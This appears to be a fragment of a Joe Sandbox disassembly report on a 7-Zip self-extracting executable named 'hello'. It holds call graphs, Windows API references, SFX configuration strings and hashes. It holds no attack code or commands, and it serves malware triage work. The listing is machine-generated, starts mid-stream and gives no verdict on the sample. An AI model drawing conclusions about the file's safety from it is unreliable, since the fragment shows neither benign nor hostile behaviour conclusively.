8189->8190 8191 4038f1 8190->8191 8192 403805 3 API calls 8191->8192 8193 403901 ??3@YAXPAX 8192->8193 8194 4024fc 2 API calls 8193->8194 8195 403918 8194->8195 8196 403805 3 API calls 8195->8196 8197 403927 ??3@YAXPAX ??3@YAXPAX 8196->8197 8197->8104 8199 40112b 2 API calls 8198->8199 8200 401425 8199->8200 8201 401362 8200->8201 8202 40136e 8201->8202 8204 401380 8201->8204 8203 40112b 2 API calls 8202->8203 8203->8204 8204->8120 8206 40255a 8205->8206 8214 401398 8206->8214 8208 402565 8208->8122 8210 40381b 8209->8210 8211 403817 ??3@YAXPAX 8209->8211 8210->8211 8218 4026b1 8210->8218 8222 402f96 8210->8222 8211->8127 8215 4013dc 8214->8215 8216 4013ac 8214->8216 8215->8208 8217 40112b 2 API calls 8216->8217 8217->8215 8219 4026c7 8218->8219 8220 4026db 8219->8220 8226 402346 memmove 8219->8226 8220->8210 8223 402fa5 8222->8223 8225 402fbe 8223->8225 8227 4026e6 8223->8227 8225->8210 8226->8220 8228 4026f6 8227->8228 8229 401398 2 API calls 8228->8229 8230 402702 8229->8230 8233 402346 memmove 8230->8233 8232 40270f 8232->8225 8233->8232 8235 402541 8234->8235 8236 402547 ExpandEnvironmentStringsW 8234->8236 8237 40112b 2 API calls 8235->8237 8236->8172 8237->8236 11181 40e4f9 11182 40e516 11181->11182 11183 40e506 11181->11183 11186 40de46 11183->11186 11189 401b1f VirtualFree 11186->11189 11188 40de81 ??3@YAXPAX 11188->11182 11189->11188
                                        APIs
                                          • Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
                                          • Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
                                          • Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
                                          • Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
                                          • Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
                                          • Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
                                          • Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99
                                        • GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
                                        • GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C
                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
                                          • Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F
                                          • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
                                          • Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD
                                        • _wtol.MSVCRT ref: 0040509F
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405102
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040510A
                                        • GetModuleFileNameW.KERNEL32(00000000,00000208,00000000,?,00000000), ref: 00405138
                                        • _wtol.MSVCRT ref: 00405217
                                        • ??2@YAPAXI@Z.MSVCRT(00000010,004177C4,004177C4,?,00000000), ref: 0040538F
                                          • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404E85
                                          • Part of subcall function 00404E3F: ??3@YAXPAX@Z.MSVCRT(004177C4,004177C4,004177C4,00000000,0000002B,004177C4,004177C4,00000000,0000002B,;!@InstallEnd@!,;!@Install@!UTF-8!,00000000,00000000), ref: 00404EAB
                                          • Part of subcall function 00404E3F: wsprintfA.USER32 ref: 00404EBC
                                          • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                          • Part of subcall function 00402844: lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                          • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?), ref: 004028E4
                                          • Part of subcall function 00402844: memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                          • Part of subcall function 00402844: memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405453
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 0040545B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000009,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405463
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054DD
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054E5
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000A,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004054ED
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405509
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405511
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405519
                                          • Part of subcall function 00403093: ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405559
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405561
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 00405569
                                          • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,00000020,?,?,00405650,?,00414668,?,00000000,?), ref: 00403BA1
                                          • Part of subcall function 00403B94: lstrlenW.KERNEL32(?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00403BAA
                                          • Part of subcall function 00403B94: _wcsnicmp.MSVCRT ref: 00403BB6
                                        • wsprintfW.USER32 ref: 00405595
                                        • _wtol.MSVCRT ref: 004057DE
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040587B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 00405883
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4,?,00000000), ref: 0040588B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,0000003D,00000000,00000000,?,?,00000000,?), ref: 00405913
                                        • ??3@YAXPAX@Z.MSVCRT(?,0000003D,00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,004177C4,004177C4), ref: 00405938
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059AA
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059B2
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000011,00000000,00000000,0000003D,00000000,00000000,?,?,00000000,?), ref: 004059BA
                                        • CoInitialize.OLE32(00000000), ref: 004059E9
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405A30
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405A38
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405A40
                                        • GetKeyState.USER32(00000010), ref: 00405AA1
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405BCD
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BDB
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BE3
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C16
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C1E
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C26
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00405C2E
                                        • memset.MSVCRT ref: 004060AE
                                        • ShellExecuteExW.SHELL32(?), ref: 0040617E
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?), ref: 0040619A
                                        • CloseHandle.KERNEL32(?,?,?,?), ref: 004061A6
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004061D4
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004061DC
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 004061E4
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 004061EA
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 004061FD
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00406205
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406222
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040622A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406232
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 0040623A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00406242
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 0040624A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall), ref: 00406252
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 0040626E
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00406276
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405BEB
                                          • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                          • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                          • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                          • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                          • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                          • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                          • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                          • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,004177C4), ref: 00405C4A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?), ref: 00405C52
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C5A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C62
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,00000000,?), ref: 00405C94
                                        • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405CD4
                                        • ??3@YAXPAX@Z.MSVCRT(?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D41
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D49
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D51
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405D59
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E20
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E28
                                        • GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,00417788), ref: 00405E32
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000,?), ref: 00405EEC
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,00417788,?,?,?,?,?,?,?,?,00000000), ref: 00405EF4
                                        • _wtol.MSVCRT ref: 00405F65
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?,?,?,?), ref: 00406294
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?,?,?,?), ref: 0040629C
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?,?,?,?), ref: 004062A4
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062AA
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062B2
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062BA
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062C2
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062CA
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000001,00000010,?,?,?,?), ref: 004062D2
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?), ref: 004062F1
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?), ref: 004062F9
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?,?), ref: 00406301
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 00406307
                                        • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406343
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040636D
                                        • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,?,?,?,?,00000000,?,?,?), ref: 004063E6
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?), ref: 0040643D
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,?,?,?), ref: 00406445
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,?,?,?), ref: 0040644D
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406455
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040646A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 0040647B
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00406483
                                        • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 0040649C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: ??3@$lstrlen$Message$_wtol$??2@FileFormatHandleModuleTimerlstrcpymemcmpwsprintf$AttributesCallbackCloseCommandCreateCurrentDirectoryDispatchDispatcherErrorExecuteFreeInitializeKillLastLineLocalNameObjectShellSingleStateUserVersionWaitWindow_wcsnicmpmemmovememsetwvsprintf
                                        • String ID: 4AA$4DA$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$;!@Install@!UTF-8!$;!@InstallEnd@!$@DA$AutoInstall$BeginPrompt$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$XpA$amd64$del$forcenowait$hidcon$i386$nowait$setup.exe$sfxconfig$sfxversion$shc$x64$x86$IA
                                        • API String ID: 154539431-3058303289
                                        • Opcode ID: 487138a178580eda3ece8cfdceac7d94c04d5ea51ae98c448ec9f2ba9b6a03be
                                        • Instruction ID: bd55e9a5e2f2b8c77b34d16bce6880ff8bafa7c96c93ceffa7f521d25999041e
                                        • Opcode Fuzzy Hash: 487138a178580eda3ece8cfdceac7d94c04d5ea51ae98c448ec9f2ba9b6a03be
                                        • Instruction Fuzzy Hash: 65C2E231904619AADF21AF61DC45AEF3769EF00708F54403BF906B61E2EB7C9981CB5D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 651 401626-401636 652 401642-40166d call 40874d call 40a62f 651->652 653 401638-40163d 651->653 658 401680-40168c call 401411 652->658 659 40166f 652->659 654 401980-401983 653->654 665 401962-40197d ??3@YAXPAX@Z call 40eca9 658->665 666 401692-401697 658->666 660 401671-40167b call 40eca9 659->660 667 40197f 660->667 665->667 666->665 668 40169d-4016d3 call 401329 call 401454 call 401362 ??3@YAXPAX@Z 666->668 667->654 678 401948-40194b 668->678 679 4016d9-4016f8 668->679 680 40194d-401960 ??3@YAXPAX@Z call 40eca9 678->680 683 401713-401717 679->683 684 4016fa-40170e call 40eca9 ??3@YAXPAX@Z 679->684 680->667 687 401719-40171c 683->687 688 40171e-401723 683->688 684->660 690 40174b-401762 687->690 691 401745-401748 688->691 692 401725 688->692 690->684 695 401764-401787 690->695 691->690 693 401727-40172d 692->693 697 40172f-401740 call 40eca9 ??3@YAXPAX@Z 693->697 701 4017a2-4017a8 695->701 702 401789-40179d call 40eca9 ??3@YAXPAX@Z 695->702 697->660 704 4017c4-4017d6 GetLocalTime SystemTimeToFileTime 701->704 705 4017aa-4017ad 701->705 702->660 706 4017dc-4017df 704->706 708 4017b6-4017c2 705->708 709 4017af-4017b1 705->709 710 4017e1-4017eb call 403354 706->710 711 4017f8-4017ff call 40301a 706->711 708->706 709->693 710->697 716 4017f1-4017f3 710->716 715 401804-401809 711->715 717 401934-401943 GetLastError 715->717 718 40180f-401812 715->718 716->693 717->678 719 401818-401822 ??2@YAPAXI@Z 718->719 720 40192a-40192d 718->720 722 401833 719->722 723 401824-401831 719->723 720->717 724 401835-401859 call 4010e2 call 40db53 722->724 723->724 729 40190f-401928 call 408726 call 40eca9 724->729 730 40185f-40187d GetLastError call 4012f7 call 402d5a 724->730 729->680 739 4018ba-4018cf call 403354 730->739 740 40187f-401886 730->740 744 4018d1-4018d9 739->744 745 4018db-4018f3 call 40db53 739->745 743 40188a-40189a ??3@YAXPAX@Z 740->743 746 4018a2-4018b5 call 40eca9 ??3@YAXPAX@Z 743->746 747 40189c-40189e 743->747 744->743 753 4018f5-401904 GetLastError 745->753 754 401906-40190e ??3@YAXPAX@Z 745->754 746->660 747->746 753->743 754->729
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                        • Instruction ID: 8ae67fe93764504dd4472983a8ee98937692ca3eac7777145cc28303e79798ac
                                        • Opcode Fuzzy Hash: f637a799f1653e3b63fa741730d3cbaf64608c0369243d42a1217ae41316ed6c
                                        • Instruction Fuzzy Hash: 8DB17C71900205EFCB14EFA5D8849AEB7B5FF44304B24842BF512BB2F1EB39A945CB58

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1082 40301a-403031 GetFileAttributesW 1083 403033-403035 1082->1083 1084 403037-403039 1082->1084 1085 403090-403092 1083->1085 1086 403048-40304f 1084->1086 1087 40303b-403046 SetLastError 1084->1087 1088 403051-403058 call 402fed 1086->1088 1089 40305a-40305d 1086->1089 1087->1085 1088->1085 1091 40308d-40308f 1089->1091 1092 40305f-403070 FindFirstFileW 1089->1092 1091->1085 1092->1088 1094 403072-40308b FindClose CompareFileTime 1092->1094 1094->1088 1094->1091
                                        APIs
                                        • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 00403028
                                        • SetLastError.KERNEL32(00000010), ref: 0040303D
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: AttributesErrorFileLast
                                        • String ID:
                                        • API String ID: 1799206407-0
                                        • Opcode ID: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                        • Instruction ID: 32a2c072cbeca167af0ba40feded167abd8377b8b15159977275e4e23b0806bf
                                        • Opcode Fuzzy Hash: 611e1059d124648bfa8909f45edfa8144be0e8992cd1f43fa13480e02f084d79
                                        • Instruction Fuzzy Hash: 42018B30102004AADF206F749C4CAAB3BACAB0136BF108632F621F11D8D738DB46965E
                                        APIs
                                        • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 004011A6
                                        • SendMessageW.USER32(00008001,00000000,?), ref: 004011FF
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: DiskFreeMessageSendSpace
                                        • String ID:
                                        • API String ID: 696007252-0
                                        • Opcode ID: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                        • Instruction ID: 9edb1a80411cac00ba33afe52a6c86c35bfa08927eae57e7515b94cd88b359ae
                                        • Opcode Fuzzy Hash: 3a86173e64e6b0f12d7b84feb59694df1deaa45c142369f31f6b7a0286f107e3
                                        • Instruction Fuzzy Hash: 1C014B30654209ABEB18EB90DD85F9A3BE9EB05704F108436F611F91F0CB79BA408B1D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 757 411def-411e64 __set_app_type __p__fmode __p__commode call 411f7b 760 411e72-411ec9 call 411f66 _initterm __getmainargs _initterm 757->760 761 411e66-411e71 __setusermatherr 757->761 764 411f05-411f08 760->764 765 411ecb-411ed3 760->765 761->760 766 411ee2-411ee6 764->766 767 411f0a-411f0e 764->767 768 411ed5-411ed7 765->768 769 411ed9-411edc 765->769 770 411ee8-411eea 766->770 771 411eec-411efd GetStartupInfoA 766->771 767->764 768->765 768->769 769->766 772 411ede-411edf 769->772 770->771 770->772 773 411f10-411f12 771->773 774 411eff-411f03 771->774 772->766 775 411f13-411f40 GetModuleHandleA call 4064af exit _XcptFilter 773->775 774->775
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.1401306538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000B.00000002.1401291993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401332467.0000000000413000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401349481.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.000000000041A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 0000000B.00000002.1401394267.0000000000432000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_400000_hello.jbxd
                                        Similarity
                                        • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                        • String ID: HpA
                                        • API String ID: 801014965-2938899866
